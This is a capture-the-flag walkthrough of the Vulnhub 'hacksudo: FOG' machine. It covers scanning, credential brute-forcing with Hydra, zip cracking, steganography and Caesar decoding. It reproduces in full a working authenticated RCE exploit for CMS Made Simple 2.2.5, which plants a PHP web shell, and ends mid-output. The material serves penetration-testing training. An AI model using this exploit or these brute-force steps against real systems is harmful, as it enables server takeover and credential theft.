Vulnhub: Hacksudo Fog machine, detailed testing steps (different penetration testing methods)
Hacksudo Fog
Author: jason_huawen
Basic information about the target machine
Name: hacksudo: FOG
Address:
https://www.vulnhub.com/entry/hacksudo-fog,697/
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:0d:63:f0 1 60 PCS Systemtechnik GmbH
192.168.56.157 08:00:27:b4:32:a9 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.157.
NMAP scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.157 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-05 03:36 EST
Nmap scan report for bogon (192.168.56.157)
Host is up (0.00015s latency).
Not shown: 65524 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Pure-FTPd
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 62:ce:1b:7d:4e:24:0f:8a:c1:c9:ea:c4:1e:21:a7:f3 (RSA)
| 256 92:04:5a:0a:86:62:b3:ba:00:f3:82:6a:c9:8d:ae:6d (ECDSA)
|_ 256 74:c5:7c:9f:8d:06:ee:0c:54:5e:65:b2:30:42:98:49 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hacksudo FOG
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 35656/udp mountd
| 100005 1,2,3 35859/tcp mountd
| 100005 1,2,3 52010/udp6 mountd
| 100005 1,2,3 53977/tcp6 mountd
| 100021 1,3,4 34868/udp6 nlockmgr
| 100021 1,3,4 39405/tcp6 nlockmgr
| 100021 1,3,4 45117/tcp nlockmgr
| 100021 1,3,4 51204/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
443/tcp open http Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hacksudo FOG
2049/tcp open nfs_acl 3 (RPC #100227)
3306/tcp open mysql MySQL 5.5.5-10.3.27-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
| Thread ID: 91
| Capabilities flags: 63486
| Some Capabilities: Support41Auth, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, InteractiveClient, ODBCClient, SupportsTransactions, FoundRows, Speaks41ProtocolNew, LongColumnFlag, ConnectWithDatabase, SupportsCompression, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: Y=c\#97E4ur\Uth.JiTI
|_ Auth Plugin Name: mysql_native_password
35859/tcp open mountd 1-3 (RPC #100005)
43659/tcp open mountd 1-3 (RPC #100005)
45117/tcp open nlockmgr 1-4 (RPC #100021)
45775/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:B4:32:A9 (Oracle VirtualBox virtual NIC)
Service Info: Host: hacksudo.hacksudo; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.39 seconds
Getting a shell
NFS
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ showmount -e 192.168.56.157
Export list for 192.168.56.157:
No exports are listed at all.
FTP
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ ftp 192.168.56.157
Connected to 192.168.56.157.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 03:52. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Name (192.168.56.157:kali): kali
331 User kali OK. Password required
Password:
530 Login authentication failed
ftp: Login failed
ftp> quit
221-Goodbye. You uploaded 0 and downloaded 0 kbytes.
221 Logout.
Port 80
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ curl http://192.168.56.157/index1.html
<html>
<title>hacksudo-fogTEAM
</title>
<body style="background-color:black;">
<center><h1><font color=white>Hacksudo:FOG-TEAM</font></h1></center>
<img src="fog.jpg" alt="Fog Project" width="1300" height="600"> </body>
<!-- caesar-cipher ==? https://github.com/hacksudo/SoundStegno --!>
<!-- box author : hacksudo --!>
</html>
Does this mean the audio of the mp4 file has to be analysed?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ ls
nmap_full_scan smoke.mp4
The mp4 file is saved locally on Kali Linux.
┌──(kali㉿kali)-[~/Desktop/Toolsets/SoundStegno-main]
└─$ python ExWave.py -f ~/Desktop/Vulnhub/Hacksudo_Fog/smoke.mp4
_ _ _ _ _ __ __
| || (_)__| |__| |___ _ _ \ \ / /_ ___ _____
| __ | / _` / _` / -_) ' \ \ \/\/ / _` \ V / -_)
|_||_|_\__,_\__,_\___|_||_|_\_/\_/\__,_|\_/\___|
|___|v1.0 www.techchip.net
Visit for more tutorials : www.youtube.com/techchipnet
Hide your text message in wave audio file like MR.ROBOT
Please wait...
Something went wrong!! try again
It did not run successfully, so the audio analysis is set aside for now.
┌──(kali㉿kali)-[~/Desktop/Toolsets/SoundStegno-main]
└─$ nikto -h http://192.168.56.157
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.157
+ Target Hostname: 192.168.56.157
+ Target Port: 80
+ Start Time: 2023-01-05 04:06:44 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 355, size: 5c2081d0bc3f3, mtime: gzip
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie CMSSESSIDb272ee47bbbb created without the httponly flag
+ OSVDB-3092: /cms/: This might be interesting...
+ 7915 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2023-01-05 04:07:03 (GMT-5) (19 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
The nikto tool found the /cms directory; visiting it reveals the CMS in use:
This site is powered by CMS Made Simple version 2.2.5
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ searchsploit CMS Made Simple 2.2.5
------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------- ---------------------------------
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution | php/webapps/44976.py
CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
The first exploit requires username/password authentication, so it is set aside for now; next, enumerate directories and files.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ gobuster dir -u http://192.168.56.157 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.157
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Timeout: 10s
===============================================================
2023/01/05 20:48:06 Starting gobuster in directory enumeration mode
===============================================================
/cms (Status: 301) [Size: 314] [--> http://192.168.56.157/cms/]
/fog (Status: 301) [Size: 314] [--> http://192.168.56.157/fog/]
/server-status (Status: 403) [Size: 279]
Progress: 219854 / 220561 (99.68%)
===============================================================
2023/01/05 20:50:31 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ gobuster dir -u http://192.168.56.157/cms -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.157/cms
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Timeout: 10s
===============================================================
2023/01/05 20:50:40 Starting gobuster in directory enumeration mode
===============================================================
/modules (Status: 301) [Size: 322] [--> http://192.168.56.157/cms/modules/]
/uploads (Status: 301) [Size: 322] [--> http://192.168.56.157/cms/uploads/]
/doc (Status: 301) [Size: 318] [--> http://192.168.56.157/cms/doc/]
/admin (Status: 301) [Size: 320] [--> http://192.168.56.157/cms/admin/]
/assets (Status: 301) [Size: 321] [--> http://192.168.56.157/cms/assets/]
/lib (Status: 301) [Size: 318] [--> http://192.168.56.157/cms/lib/]
/tmp (Status: 301) [Size: 318] [--> http://192.168.56.157/cms/tmp/]
Progress: 219787 / 220561 (99.65%)
===============================================================
2023/01/05 20:53:22 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ gobuster dir -u http://192.168.56.157 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt,.js
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.157
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: sh,txt,js,php,html
[+] Timeout: 10s
===============================================================
2023/01/05 20:53:41 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 853]
/index.php (Status: 302) [Size: 0] [--> /fog/index.php]
/index1.html (Status: 200) [Size: 329]
/cms (Status: 301) [Size: 314] [--> http://192.168.56.157/cms/]
/dict.txt (Status: 200) [Size: 1798]
/fog (Status: 301) [Size: 314] [--> http://192.168.56.157/fog/]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1323269 / 1323366 (99.99%)
===============================================================
2023/01/05 21:06:31 Finished
===============================================================
┌──(kali㉿kali)-[~]
└─$ cd ~/Desktop/Vulnhub/Hacksudo_Fog
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ wget http://192.168.56.157/dict.txt
--2023-01-05 20:56:15-- http://192.168.56.157/dict.txt
Connecting to 192.168.56.157:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1798 (1.8K) [text/plain]
Saving to: ‘dict.txt’
dict.txt 100%[=====================================================>] 1.76K --.-KB/s in 0s
2023-01-05 20:56:15 (137 MB/s) - ‘dict.txt’ saved [1798/1798]
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ ls
dict.txt nmap_full_scan smoke.mp4
dict.txt looks like a password wordlist, but what is the username?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ hydra -l admin -P dict.txt 192.168.56.157 http-post-form "/cms/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:incorrect"
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-05 21:04:55
[DATA] max 16 tasks per 1 server, overall 16 tasks, 196 login tries (l:1/p:196), ~13 tries per task
[DATA] attacking http-post-form://192.168.56.157:80/cms/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:incorrect
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-05 21:04:59
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ hydra -l hacksudo -P dict.txt 192.168.56.157 http-post-form "/cms/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:incorrect"
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-05 21:05:19
[DATA] max 16 tasks per 1 server, overall 16 tasks, 196 login tries (l:1/p:196), ~13 tries per task
[DATA] attacking http-post-form://192.168.56.157:80/cms/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:incorrect
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-05 21:05:23
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ hydra -L dict.txt -P dict.txt 192.168.56.157 http-post-form "/cms/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:incorrect"
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-05 21:05:42
[DATA] max 16 tasks per 1 server, overall 16 tasks, 38416 login tries (l:196/p:196), ~2401 tries per task
[DATA] attacking http-post-form://192.168.56.157:80/cms/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:incorrect
[STATUS] 3412.00 tries/min, 3412 tries in 00:01h, 35004 to do in 00:11h, 16 active
[STATUS] 3340.67 tries/min, 10022 tries in 00:03h, 28394 to do in 00:09h, 16 active
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
It seems dict.txt is not the wordlist for the HTTP login; what about FTP?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ hydra -l hacksudo -P dict.txt ftp://192.168.56.157
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-05 21:12:28
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 196 login tries (l:1/p:196), ~13 tries per task
[DATA] attacking ftp://192.168.56.157:21/
[21][ftp] host: 192.168.56.157 login: hacksudo password: hackme
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-05 21:12:44
Ha, it really is the FTP password. The HTTP home page carries a comment saying the box author is hacksudo, so the username was assumed to be hacksudo here.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ ftp 192.168.56.157
Connected to 192.168.56.157.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 21:14. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Name (192.168.56.157:kali): hacksudo
331 User hacksudo OK. Password required
Password:
230 OK. Current directory is /
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Extended Passive mode OK (|||29066|)
150 Accepted data connection
drwxr-xr-x 3 1002 ftpgroup 4096 May 7 2021 .
drwxr-xr-x 3 1002 ftpgroup 4096 May 7 2021 ..
-rw-r--r-- 1 33 33 389 May 7 2021 flag1.txt
drwxr-xr-x 2 0 0 4096 May 6 2021 hacksudo_ISRO_bak
226-Options: -a -l
226 4 matches total
ftp> get flag1.txt
local: flag1.txt remote: flag1.txt
229 Extended Passive mode OK (|||50546|)
150 Accepted data connection
100% |*********************************************************************************| 389 10.00 KiB/s 00:00 ETA
226-File successfully transferred
226 0.038 seconds (measured here), 10.05 Kbytes per second
389 bytes received in 00:00 (9.45 KiB/s)
ftp> cd hacksudo_ISRO_bak
250 OK. Current directory is /hacksudo_ISRO_bak
ftp> ls -alh
229 Extended Passive mode OK (|||3496|)
150 Accepted data connection
drwxr-xr-x 2 0 0 4096 May 6 2021 .
drwxr-xr-x 3 1002 ftpgroup 4096 May 7 2021 ..
-rw-r--r-- 1 0 0 63 May 5 2021 authors.txt
-rw-r--r-- 1 0 0 0 May 6 2021 installfog
-rw-r--r-- 1 0 0 1573833 May 6 2021 secr3tSteg.zip
226-Options: -a -l
226 5 matches total
ftp> get authors.txt
local: authors.txt remote: authors.txt
229 Extended Passive mode OK (|||37285|)
150 Accepted data connection
100% |*********************************************************************************| 63 1.66 KiB/s 00:00 ETA
226-File successfully transferred
226 0.037 seconds (measured here), 1.66 Kbytes per second
63 bytes received in 00:00 (1.66 KiB/s)
ftp> get secr3tSteg.zip
local: secr3tSteg.zip remote: secr3tSteg.zip
229 Extended Passive mode OK (|||1388|)
150-Accepted data connection
150 1536.9 kbytes to download
100% |*********************************************************************************| 1536 KiB 12.68 MiB/s 00:00 ETA
226-File successfully transferred
226 0.116 seconds (measured here), 12.95 Mbytes per second
1573833 bytes received in 00:00 (12.63 MiB/s)
ftp> quit
221-Goodbye. You uploaded 0 and downloaded 1538 kbytes.
221 Logout.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ ls
authors.txt dict.txt flag1.txt nmap_full_scan secr3tSteg.zip smoke.mp4
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ cat flag1.txt
great you done step 1
___ ___ _ __ __ _ _ __ __ _| |_ _ _| | __ _| |_(_) ___ _ __
/ __/ _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \
| (_| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | |
\___\___/|_| |_|\__, |_| \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|
|___/
www.hacksudo.com
This yields the first flag; the files downloaded from FTP to Kali Linux are worth a closer look.
Next, John the Ripper is used to crack the password-protected zip archive (secr_hash holds the PKZIP hash extracted from secr3tSteg.zip), first trying the dict.txt obtained earlier as the wordlist:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ john --wordlist=dict.txt secr_hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 DONE (2023-01-05 21:16) 0g/s 1960p/s 1960c/s 1960C/s hacker
Session completed.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ john --show secr_hash
0 password hashes cracked, 1 left
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt secr_hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
fooled (secr3tSteg.zip)
1g 0:00:00:00 DONE (2023-01-05 21:17) 3.448g/s 946317p/s 946317c/s 946317C/s jedidah..dukefan
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
This time rockyou.txt is needed as the wordlist; the password is recovered successfully and the zip archive is extracted.
Extraction yields a WAV file and a txt file. The txt file does not seem useful, but the WAV can be analysed with the SoundStegno tool tried at the beginning.
┌──(kali㉿kali)-[~/Desktop/Toolsets/SoundStegno-main]
└─$ python ExWave.py -f ~/Desktop/Vulnhub/Hacksudo_Fog/hacksudoSTEGNO.wav
_ _ _ _ _ __ __
| || (_)__| |__| |___ _ _ \ \ / /_ ___ _____
| __ | / _` / _` / -_) ' \ \ \/\/ / _` \ V / -_)
|_||_|_\__,_\__,_\___|_||_|_\_/\_/\__,_|\_/\___|
|___|v1.0 www.techchip.net
Visit for more tutorials : www.youtube.com/techchipnet
Hide your text message in wave audio file like MR.ROBOT
Please wait...
Your Secret Message is: Shift by 3
ABCDEFGHIJKLMNOPQRSTUVWXYZ
DEFGHIJKLMNOPQRSTUVWXYZABC
zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR
The hint says the text is shifted by 3 positions, which points to a Caesar cipher. Decrypting with the online site
https://www.qqxiuzi.cn/bianma/kaisamima.php
gives:
XYZABCDEFGHIJKLMNOPQRSTUVW
ABCDEFGHIJKLMNOPQRSTUVWXYZ
wwww.localhost/fog Username=fog:password=hacksudoISRO
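As an added example (not part of the original walkthrough), the same Caesar decoding done offline in Python instead of on the online site: decode() undoes the known shift of 3, crack() goes further and tries all 25 shifts, ranking candidates with a small constructed wordlist so it also works when the shift is unknown, and extract_credentials() parses the Username=...:password=... format of the recovered hint.

```python
# Added example: offline Caesar-cipher decoder for the hint hidden in the WAV.
# The hint said "Shift by 3"; decode() undoes a known shift, while crack()
# tries every non-trivial shift and ranks the results by plausible words,
# which is what you do when the shift is not given.
import string

# Ciphertext as recovered from the WAV file on the page.
CIPHERTEXT = "zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR"

# Constructed scoring list: words that make a candidate plaintext plausible.
COMMON_WORDS = ("localhost", "username", "password", "user", "pass", "admin", "the")


def shift_char(ch, shift):
    """Shift one ASCII letter by `shift` positions, preserving case; leave other chars alone."""
    if ch in string.ascii_lowercase:
        return string.ascii_lowercase[(string.ascii_lowercase.index(ch) + shift) % 26]
    if ch in string.ascii_uppercase:
        return string.ascii_uppercase[(string.ascii_uppercase.index(ch) + shift) % 26]
    return ch


def encode(text, shift):
    """Caesar-encode by shifting letters forward (mod 26)."""
    return "".join(shift_char(c, shift) for c in text)


def decode(text, shift):
    """Undo a known shift (the page's hint: shift by 3)."""
    return encode(text, -shift)


def score(candidate):
    """Count scoring words present in a candidate; higher means more plausible."""
    lowered = candidate.lower()
    return sum(1 for w in COMMON_WORDS if w in lowered)


def crack(text):
    """Brute-force all 25 non-identity shifts; return (best_shift, plaintext, ranked list)."""
    ranked = sorted(
        ((score(decode(text, s)), s, decode(text, s)) for s in range(1, 26)),
        reverse=True,
    )
    _best_score, best_shift, best_plain = ranked[0]
    return best_shift, best_plain, ranked


def extract_credentials(plaintext):
    """Pull key=value pairs (Username=...:password=...) out of the decoded hint."""
    creds = {}
    for part in plaintext.split():
        if "=" not in part:
            continue
        for kv in part.split(":"):
            key, _, value = kv.partition("=")
            creds[key.lower()] = value
    return creds


if __name__ == "__main__":
    print(decode(CIPHERTEXT, 3))
    shift, plain, _ = crack(CIPHERTEXT)
    print("best shift:", shift, "->", plain)
    print(extract_credentials(plain))
```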
The username and password obtained here should be the login credentials for /cms/admin; a manual check confirms they are valid.
The exploit script found earlier can now be used.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ searchsploit CMS Made Simple 2.2.5
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution | php/webapps/44976.py
CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ searchsploit -m php/webapps/44976.py
Exploit: CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution
URL: https://www.exploit-db.com/exploits/44976
Path: /usr/share/exploitdb/exploits/php/webapps/44976.py
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/Vulnhub/Hacksudo_Fog/44976.py
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ ls
44976.py dict.txt hacksudoSTEGNO.wav secr3tSteg.zip secr_hash
authors.txt flag1.txt nmap_full_scan secr3t.txt smoke.mp4
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ mv 44976.py exploit.py
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ ls
authors.txt exploit.py hacksudoSTEGNO.wav secr3tSteg.zip secr_hash
dict.txt flag1.txt nmap_full_scan secr3t.txt smoke.mp4
exploit.py needs to be modified, including the target host's IP address.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ cat exploit.py
# Exploit Title: CMS Made Simple 2.2.5 authenticated Remote Code Execution
# Date: 3rd of July, 2018
# Exploit Author: Mustafa Hasan (@strukt93)
# Vendor Homepage: http://www.cmsmadesimple.org/
# Software Link: http://www.cmsmadesimple.org/downloads/cmsms/
# Version: 2.2.5
# CVE: CVE-2018-1000094
import requests
import base64
base_url = "http://192.168.56.157/cms/admin"
upload_dir = "/uploads"
upload_url = base_url.split('/admin')[0] + upload_dir
username = "fog"
password = "hacksudoISRO"
csrf_param = "_sk_"
txt_filename = 'cmsmsrce.txt'
php_filename = 'shell.php'
payload = "<?php system($_GET['cmd']);?>"
def parse_csrf_token(location):
    print location
    return location.split(csrf_param+"=")[1]
def authenticate():
    page = "/login.php"
    url = base_url + page
    data = {
        "username": username,
        "password": password,
        "loginsubmit": "Submit"
    }
    response = requests.post(url, data=data, allow_redirects=False)
    status_code = response.status_code
    if status_code == 302:
        print "[+] Authenticated successfully with the supplied credentials"
        #print response.cookies
        print '*'*20
        cookies = requests.utils.dict_from_cookiejar(response.cookies)
        print cookies
        print response.headers['Location']
        return cookies, parse_csrf_token(response.headers['Location'])
    print "[-] Authentication failed"
    return None, None
def upload_txt(cookies, csrf_token):
    mact = "FileManager,m1_,upload,0"
    page = "/moduleinterface.php"
    url = base_url + page
    data = {
        "mact": mact,
        csrf_param: csrf_token,
        "disable_buffer": 1
    }
    txt = {
        'm1_files[]': (txt_filename, payload)
    }
    print "[*] Attempting to upload {}...".format(txt_filename)
    response = requests.post(url, data=data, files=txt, cookies=cookies)
    #print response.text
    status_code = response.status_code
    if status_code == 200:
        print "[+] Successfully uploaded {}".format(txt_filename)
        return True
    print "[-] An error occurred while uploading {}".format(txt_filename)
    return None
def copy_to_php(cookies, csrf_token):
    mact = "FileManager,m1_,fileaction,0"
    page = "/moduleinterface.php"
    url = base_url + page
    b64 = base64.b64encode(txt_filename)
    serialized = 'a:1:{{i:0;s:{}:"{}";}}'.format(len(b64), b64)
    data = {
        "mact": mact,
        csrf_param: csrf_token,
        "m1_fileactioncopy": "",
        "m1_path": upload_dir,
        "m1_selall": serialized,
        "m1_destdir": "/",
        "m1_destname": php_filename,
        "m1_submit": "Copy"
    }
    print "[*] Attempting to copy {} to {}...".format(txt_filename, php_filename)
    response = requests.post(url, data=data, cookies=cookies, allow_redirects=False)
    print 'check response'
    status_code = response.status_code
    print response.text
    if status_code == 302:
        if response.headers['Location'].endswith('copysuccess'):
            print "[+] File copied successfully"
            return True
    print "[-] An error occurred while copying, maybe {} already exists".format(php_filename)
    return None
def quit():
    print "[-] Exploit failed"
    exit()
def run():
    cookies,csrf_token = authenticate()
    print 'cookies='
    print cookies
    print 'csrf='
    print csrf_token
    if not cookies:
        quit()
    if not upload_txt(cookies, csrf_token):
        quit()
    if not copy_to_php(cookies, csrf_token):
        quit()
    print "[+] Exploit succeeded, shell can be found at: {}".format(upload_url + '/' + php_filename)
run()
The parts of the exploit script that need to be modified are mainly:
the IP address
base_url
csrf_param
These values can be obtained from the browser's developer tools.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ python2 exploit.py
[+] Authenticated successfully with the supplied credentials
********************
{'_sk_': '9929b45a18f71fa7e13', 'CMSSESSIDb272ee47bbbb': 'gjchtrm81f5l9ea66896su247q', '45ba4203b38f2ebed8db32a30c699e4e': '746ff3c7cd79fffb98549c3d3b674e35993020d4%3A%3AYTo1OntzOjM6InVpZCI7aToyO3M6ODoidXNlcm5hbWUiO3M6MzoiZm9nIjtzOjc6ImVmZl91aWQiO047czoxMjoiZWZmX3VzZXJuYW1lIjtOO3M6NToiY2tzdW0iO3M6NDA6IjI0ZTNlMmEzODg4MDU1NGFjMjg4NGIyYjRmOWNjMzc0ODI0OWVjZTAiO30%3D'}
http://192.168.56.157/cms/admin?_sk_=9929b45a18f71fa7e13
http://192.168.56.157/cms/admin?_sk_=9929b45a18f71fa7e13
cookies=
